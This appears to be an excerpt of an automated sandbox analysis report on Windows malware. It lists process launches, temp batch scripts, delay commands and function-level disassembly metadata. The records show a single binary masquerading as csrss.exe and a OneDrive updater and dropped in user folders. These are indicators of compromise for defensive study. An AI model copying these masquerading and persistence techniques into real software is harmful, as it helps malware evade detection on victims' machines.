Imagebase:	0x7ff7be130000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	07:56:03
Start date:	13/01/2025
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff6c0780000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	07:56:04
Start date:	13/01/2025
Path:	C:\Users\Public\Documents\csrss.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\All Users\Documents\csrss.exe"
Imagebase:	0x8c0000
File size:	848'896 bytes
MD5 hash:	C1F1BEA182F1C3477C2F133C3AC26930
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	07:56:06
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\MCv5EqkMBH.bat" "
Imagebase:	0x7ff62bb50000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	07:56:06
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	07:56:07
Start date:	13/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff7be130000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	07:56:07
Start date:	13/01/2025
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff6ee630000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	07:56:09
Start date:	13/01/2025
Path:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe"
Imagebase:	0x290000
File size:	848'896 bytes
MD5 hash:	C1F1BEA182F1C3477C2F133C3AC26930
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	07:56:12
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\T7zpOYzElC.bat" "
Imagebase:	0x7ff62bb50000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	07:56:12
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	07:56:12
Start date:	13/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff7be130000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	07:56:12
Start date:	13/01/2025
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff6c0780000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	63
Start time:	07:56:13
Start date:	13/01/2025
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\NetHood\MjlsqDcSPlv.exe"
Imagebase:	0x680000
File size:	848'896 bytes
MD5 hash:	C1F1BEA182F1C3477C2F133C3AC26930
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	64
Start time:	07:56:15
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\VzpByHn75i.bat" "
Imagebase:	0x7ff62bb50000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	65
Start time:	07:56:15
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	66
Start time:	07:56:15
Start date:	13/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff7be130000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	67
Start time:	07:56:15
Start date:	13/01/2025
Path:	C:\Users\Public\Documents\csrss.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\All Users\Documents\csrss.exe"
Imagebase:	0xb00000
File size:	848'896 bytes
MD5 hash:	C1F1BEA182F1C3477C2F133C3AC26930
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	68
Start time:	07:56:15
Start date:	13/01/2025
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff6c0780000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	69
Start time:	07:56:17
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\GogtzRNUlL.bat" "
Imagebase:	0x7ff62bb50000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	70
Start time:	07:56:17
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	15.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	20.8%
Total number of Nodes:	24
Total number of Limit Nodes:	2

Executed Functions

Function 00007FFAAC468E70 Relevance: 16.3, Strings: 12, Instructions: 1327
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

%, xrefs: 00007FFAAC46B563
@, xrefs: 00007FFAAC46B64C
p[, xrefs: 00007FFAAC46C0D1
p[, xrefs: 00007FFAAC46C138
p[, xrefs: 00007FFAAC46C21C
p[, xrefs: 00007FFAAC46C1E3
T_H, xrefs: 00007FFAAC46C192
r6, xrefs: 00007FFAAC46B483
p[, xrefs: 00007FFAAC46C1AA
p[, xrefs: 00007FFAAC46C255
p[, xrefs: 00007FFAAC46C171
p[, xrefs: 00007FFAAC46C0FF

Memory Dump Source

Source File: 00000000.00000002.1399214506.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac460000_OneDriveStandaloneUpdater.jbxd

Similarity

API ID:
String ID: %$@$p[$p[$p[$p[$p[$p[$p[$p[$r6$T_H
API String ID: 0-1845073768
Opcode ID: 335cf497771da13250192cf7db349d44e7a38ad8447ed5ae02aedddb627d57e9
Instruction ID: ca17a88585a67855cb92e543dcbca49fc31dbb21cd8e84cfced84a1af5a849d4
Opcode Fuzzy Hash: 335cf497771da13250192cf7db349d44e7a38ad8447ed5ae02aedddb627d57e9
Instruction Fuzzy Hash: 4492F871A1CB458FE7A8DB28C8597B9B3E1EF95304F14457DD08EC3296CE38E8468786

Function 00007FFAAC5DCA69 Relevance: 6.1, Strings: 4, Instructions: 1076COMMON

Download Yara Rule

Strings

8h, xrefs: 00007FFAAC5DCB02
}, xrefs: 00007FFAAC5DCC6B
PB_H, xrefs: 00007FFAAC5DD3D4
VB_H, xrefs: 00007FFAAC5DCDCD

Memory Dump Source

Source File: 00000000.00000002.1401623359.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac5d0000_OneDriveStandaloneUpdater.jbxd

Similarity

API ID:
String ID: }$8h$PB_H$VB_H
API String ID: 0-1712879934
Opcode ID: ad8fc30106daf6480906971f1b78c8f644587766b0f050949f1ff79937f10b91
Instruction ID: 148e7469629604dc7bba3134787131ac79d49891107eaa43bc4806b747fe3814
Opcode Fuzzy Hash: ad8fc30106daf6480906971f1b78c8f644587766b0f050949f1ff79937f10b91
Instruction Fuzzy Hash: 5962D071A5DB4B8BF799DB18985177937D5EF86300F1480BAE04EC72D2DE28FC0A8681

Function 00007FFAAC46C350 Relevance: 2.2, Instructions: 2241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1399214506.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac460000_OneDriveStandaloneUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 972c26017a48a668d3a0e3717fdf6dcc921c40a630902d79c2e8705889fa5fc8
Instruction ID: 26c7bbabd5705145cd91e71cb1bcfffd0ba3177e130f3796e4bc102e86d185ac
Opcode Fuzzy Hash: 972c26017a48a668d3a0e3717fdf6dcc921c40a630902d79c2e8705889fa5fc8
Instruction Fuzzy Hash: BC03E170A0852C8FDB99EF18C499BA9B7F5FB58304F20C1AED00ED3695CA759D86CB44

Function 00007FFAAC468B98 Relevance: 1.9, APIs: 1, Instructions: 406COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE ref: 00007FFAAC46AF9F

Memory Dump Source

Source File: 00000000.00000002.1399214506.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac460000_OneDriveStandaloneUpdater.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: d63b40aa6bcf2dd7cb2dddecbf564e5f5b863104c0e5862e14c9ffed0f431a3f
Instruction ID: 2292e97b3e5a5243c66b96ac0baae8bdfa5408eb859662e180b6b884db655ffc
Opcode Fuzzy Hash: d63b40aa6bcf2dd7cb2dddecbf564e5f5b863104c0e5862e14c9ffed0f431a3f
Instruction Fuzzy Hash: 12B1F331A0DF098FF7589718D4496B9B7D2EB96325F04827ED04ED329ADE24E80A87C5

Function 00007FFAAC46C425 Relevance: .5, Instructions: 471COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1399214506.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac460000_OneDriveStandaloneUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c117cf5389af66bebcad9815f43fb7ffed3ee31a2d73718ab304f6038db9e39
Instruction ID: d9e5da5135e397841483b296f6639c0185e66e00c7f09b461db24824ec7605a2
Opcode Fuzzy Hash: 2c117cf5389af66bebcad9815f43fb7ffed3ee31a2d73718ab304f6038db9e39
Instruction Fuzzy Hash: 56E1577190D7558BF36D8B18D4593B677D0EB92328F24D17ED0DF83692CE28A80A87C9

Function 00007FFAAC468028 Relevance: .4, Instructions: 431COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1399214506.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac460000_OneDriveStandaloneUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11abe81b2d2525bcfeb38f1803cf546c52ce7460d5280d5f5aff04dc8ba7aaa9
Instruction ID: 6b64971934d2b97d0940c5b2f004113c13021d57a5386fddcfe1ba38cf140efa
Opcode Fuzzy Hash: 11abe81b2d2525bcfeb38f1803cf546c52ce7460d5280d5f5aff04dc8ba7aaa9
Instruction Fuzzy Hash: 85D11971A2DA498FFB58EB28C4596B9B7E1FB99304F50857DD04EC31C6CE28E80687C5

Function 00007FFAAC461222 Relevance: .4, Instructions: 393COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1399214506.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac460000_OneDriveStandaloneUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98b43120413ba1d71036d73c3dbdb420bcdba22624b9b3ccc9b5119bb2eece23
Instruction ID: 33e31efac4ebf9894554a2aa51c60dd360c5df3c0528d1e8e192c49a7fd198aa
Opcode Fuzzy Hash: 98b43120413ba1d71036d73c3dbdb420bcdba22624b9b3ccc9b5119bb2eece23
Instruction Fuzzy Hash: 95C1482091E68A8FF75A9738C4596B5BBD1EF87324F0480BAD48FC719BDD18E8468381

Function 00007FFAAC468E7F Relevance: .3, Instructions: 336COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1399214506.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac460000_OneDriveStandaloneUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8e197203bc1d982cd75aba24ecd73fe6233935110bc6e1570dd2852e44d98f9
Instruction ID: b19fbe29bdecda36058d188702b83fcdf61e6af93e6fe1c1274119769c1f4b5e
Opcode Fuzzy Hash: a8e197203bc1d982cd75aba24ecd73fe6233935110bc6e1570dd2852e44d98f9
Instruction Fuzzy Hash: F3A12971A2DA458FF758EB2884596B9BBE1FBA5308F14857ED04EC31C6CF68E80583C5

Function 00007FFAAC5DC30D Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

QueryFullProcessImageNameA.KERNELBASE ref: 00007FFAAC5DC4C1

Memory Dump Source

Source File: 00000000.00000002.1401623359.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac5d0000_OneDriveStandaloneUpdater.jbxd

Similarity

API ID: FullImageNameProcessQuery
String ID:
API String ID: 3578328331-0
Opcode ID: 5b7b0315a6c0fa9c341552de6e30ac97ba6a4b2a4335e3595be25aa292f92767
Instruction ID: e8c5a466b08ee915514e9f0f159ae556caa942a2cfd5bad1c93277f4daa438ba
Opcode Fuzzy Hash: 5b7b0315a6c0fa9c341552de6e30ac97ba6a4b2a4335e3595be25aa292f92767
Instruction Fuzzy Hash: 6E81B430519A8D8FEB69DF28D8457F937D1FB5A311F10827EE84EC7292CA74A8458B81

Function 00007FFAAC469D6E Relevance: 1.7, APIs: 1, Instructions: 169COMMON

Download Yara Rule

APIs

CreateFileTransactedW.KERNEL32 ref: 00007FFAAC469E99

Memory Dump Source

Source File: 00000000.00000002.1399214506.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac460000_OneDriveStandaloneUpdater.jbxd

Similarity

API ID: CreateFileTransacted
String ID:
API String ID: 2149338676-0
Opcode ID: da45baaeaa3f486ef52563cbf312db762ad50189aa6c47be47d83a69c5a98d23
Instruction ID: fadd7a59f4080edea7bde3b4bfe0c390128aeaf125fef08adb4f83fc570e8068
Opcode Fuzzy Hash: da45baaeaa3f486ef52563cbf312db762ad50189aa6c47be47d83a69c5a98d23
Instruction Fuzzy Hash: 2E51D53080DB988FDB55DF58D845AA97BE0EF6A320F1442AFE089D3252C775A845CBC2

Function 00007FFAAC469EDD Relevance: 1.6, APIs: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE ref: 00007FFAAC469FB7

Memory Dump Source

Source File: 00000000.00000002.1399214506.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac460000_OneDriveStandaloneUpdater.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 56d6b7d7a87b81216df6a3502ab98b234ccf6e5a10fcae14b86bd708403fdbcf
Instruction ID: 719d1f5fa0649a6b4c0afd0f9ec9efe7dbdb12db036a8039ee63af41d763300f
Opcode Fuzzy Hash: 56d6b7d7a87b81216df6a3502ab98b234ccf6e5a10fcae14b86bd708403fdbcf
Instruction Fuzzy Hash: E141B17190CA488FDB58DF58D8497B9BBE1FBA9321F04826FD049D3292CB74A845CB81

Function 00007FFAAC46AF18 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE ref: 00007FFAAC46AF9F

Memory Dump Source

Source File: 00000000.00000002.1399214506.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac460000_OneDriveStandaloneUpdater.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 6d4985a6c60c638212f78d9b9938fc891e7d2e0ec28582f9b4a5c4051ee9570c
Instruction ID: 858cbe5c94ab4985c7278570bb9306f69c9685920d00d858867c7a9c93ece8aa
Opcode Fuzzy Hash: 6d4985a6c60c638212f78d9b9938fc891e7d2e0ec28582f9b4a5c4051ee9570c
Instruction Fuzzy Hash: 93218071908A0C9FDB58DBA8D849BE9BBF1FB95311F00822FD00DD3651DB71A8568B91

Function 00007FFAAC46B1D4 Relevance: 1.4, APIs: 1, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00007FFAAC46B288

Memory Dump Source

Source File: 00000000.00000002.1399214506.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac460000_OneDriveStandaloneUpdater.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 213bc8c48b69596648002db16e16097c572fec5aa571b1802269d0fa55fc2e58
Instruction ID: 81b532e163a2230de3ff2d7c410ecf733c14c434c066812f54835eb33ec8b3fd
Opcode Fuzzy Hash: 213bc8c48b69596648002db16e16097c572fec5aa571b1802269d0fa55fc2e58
Instruction Fuzzy Hash: DA312C3190CA4C8FDB18EB6CD84AAF9BBE0EB56321F00422ED04DC3252DA71A846C781

Non-executed Functions

Function 00007FFAAC4748EE Relevance: 1.3, Instructions: 1275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1399214506.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac460000_OneDriveStandaloneUpdater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a74a8e5f53b16ddc709d401d4cddd0b3e1211fa2c73c71ddbaad7ba79cfd48cd
Instruction ID: b9e955a7ffea2716c3f9bf24f6cf7d2cd01a765d546421a85e5c485a04cd4042
Opcode Fuzzy Hash: a74a8e5f53b16ddc709d401d4cddd0b3e1211fa2c73c71ddbaad7ba79cfd48cd
Instruction Fuzzy Hash: F7B28F6191CA1A8BE759DB18C859AB9F7A1FF58300F4096F9C00FD71A6DA387DC08BC5

Analysis Process: csrss.exePID: 1840, Parent PID: 4056COMMON

Execution Graph

Execution Coverage:	15.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	30
Total number of Limit Nodes:	3

Executed Functions

Function 00007FFAAC5DC27D Relevance: 2.3, Strings: 1, Instructions: 1018COMMON

Download Yara Rule

Strings

Y7_H, xrefs: 00007FFAAC5DCB6D

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID: Y7_H
API String ID: 0-4081181720
Opcode ID: 3e8c0bface2b74041df30758b8ee2e8500e7b32c671b1a9a6dcadcbffe007b1f
Instruction ID: 7654be1ff8a7349040805fa82d7bc4c9ff1ce69bad2c4d381a8221a3a7ada4d5
Opcode Fuzzy Hash: 3e8c0bface2b74041df30758b8ee2e8500e7b32c671b1a9a6dcadcbffe007b1f
Instruction Fuzzy Hash: 5562046195D7468BF7A6E7388406AB977D4EF97310F0484BAE44EC7293DD28F84A83C1

Function 00007FFAAC46C350 Relevance: 2.2, Instructions: 2241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC46C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC46C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac46c000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 688afa56a59d04f6735f5b653894e8992e40fb5f9df72f96f71357c60c7b5efe
Instruction ID: 9ecd5c8b5f31a7561b745cb5d51c7481bce6fa824a9be941f3139d7e4094eb12
Opcode Fuzzy Hash: 688afa56a59d04f6735f5b653894e8992e40fb5f9df72f96f71357c60c7b5efe
Instruction Fuzzy Hash: D103E270A0852C8FDB99DF18C499BA9B7F1FB58304F20C1AED00EE3695CA759986CF45

Function 00007FFAAC46C425 Relevance: .5, Instructions: 470COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC46C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC46C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac46c000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc34d2acdf459f1c85bb782487ba804fe68fd7955abec275e4d0ba7f4c38db6a
Instruction ID: 404c06a73482f7748006cbc5c8a86e5592e35986e4921778e0550f28cecba8c9
Opcode Fuzzy Hash: dc34d2acdf459f1c85bb782487ba804fe68fd7955abec275e4d0ba7f4c38db6a
Instruction Fuzzy Hash: B0E1677190D7558BF36D8B18D4593B677D0EB92328F24D17ED0DF83692CE28A80A87C9

Function 00007FFAAC5D8AB2 Relevance: 4.1, Strings: 3, Instructions: 324
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6, xrefs: 00007FFAAC5D8E12
r6, xrefs: 00007FFAAC5D8B13
r6, xrefs: 00007FFAAC5D8B63

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID: r6$r6$r6
API String ID: 0-701349563
Opcode ID: 2a45a79a5740f1a175ba9aeff9490ae03bdca56374949b3e3ca022465b2c1e2c
Instruction ID: 127ca1f67f32b770284695fbe9d97f07db6d714e502d2b1651c411c74de99fb1
Opcode Fuzzy Hash: 2a45a79a5740f1a175ba9aeff9490ae03bdca56374949b3e3ca022465b2c1e2c
Instruction Fuzzy Hash: EDC1A17054AA478FE74EDB28C4917A4B7E5FF5A300F5481BAD04EC7A96CB28F8558BC0

Function 00007FFAAC5D91FF Relevance: 3.0, Strings: 2, Instructions: 461
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6, xrefs: 00007FFAAC5D96F2
b4, xrefs: 00007FFAAC5D9692

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID: b4$r6
API String ID: 0-544269225
Opcode ID: 081ad9449eefe2b75989ee13f689893fc6602897ae364673c5935d6f880cf8f8
Instruction ID: 72d0ae4038c1edba1a21c4f7a9798256030c91c87f49f03b809c4a42ff19e230
Opcode Fuzzy Hash: 081ad9449eefe2b75989ee13f689893fc6602897ae364673c5935d6f880cf8f8
Instruction Fuzzy Hash: 9D02D370559646CFEB49CF18C4D06B43BA5FF46310F5481BED84E8B69BDA38E885CB81

Function 00007FFAAC5D3BF5 Relevance: 2.8, Strings: 2, Instructions: 289
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6, xrefs: 00007FFAAC5D3C33
r6, xrefs: 00007FFAAC5D3EE2

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID: r6$r6
API String ID: 0-2018302956
Opcode ID: 5d26c1bb7ea5b0a1cc103307f1815448512666e0f569987b359fa89093633185
Instruction ID: 19c5c26fb906c40de6625bc078543c763d6853341e3d492a193b0fbc1e2dedf3
Opcode Fuzzy Hash: 5d26c1bb7ea5b0a1cc103307f1815448512666e0f569987b359fa89093633185
Instruction Fuzzy Hash: 5EA1AF7094DA478FE74ADB28C4916A4BBA1FF56300F54817AE04EC7AC6DB28F855CBC0

Function 00007FFAAC4CFEFA Relevance: 2.8, Strings: 2, Instructions: 284
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6, xrefs: 00007FFAAC4D0202
r6, xrefs: 00007FFAAC4CFF53

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID: r6$r6
API String ID: 0-2018302956
Opcode ID: f17ff08ce5929cc156081be640c70b28e34f3c2c4a67df1d08d71828850e3ee3
Instruction ID: 0620bc5a0986fc28d91e7e172560b119b870b6923b830a031de85424961adef7
Opcode Fuzzy Hash: f17ff08ce5929cc156081be640c70b28e34f3c2c4a67df1d08d71828850e3ee3
Instruction Fuzzy Hash: 3CA1E53050EA468FF74AEB24D4946A4BBA1FF16304F4481BAC44ECBA97DB28F855C7D4

Function 00007FFAAC5D8F88 Relevance: 2.7, Strings: 2, Instructions: 212
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6, xrefs: 00007FFAAC5D8FB7
, xrefs: 00007FFAAC5D9002

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

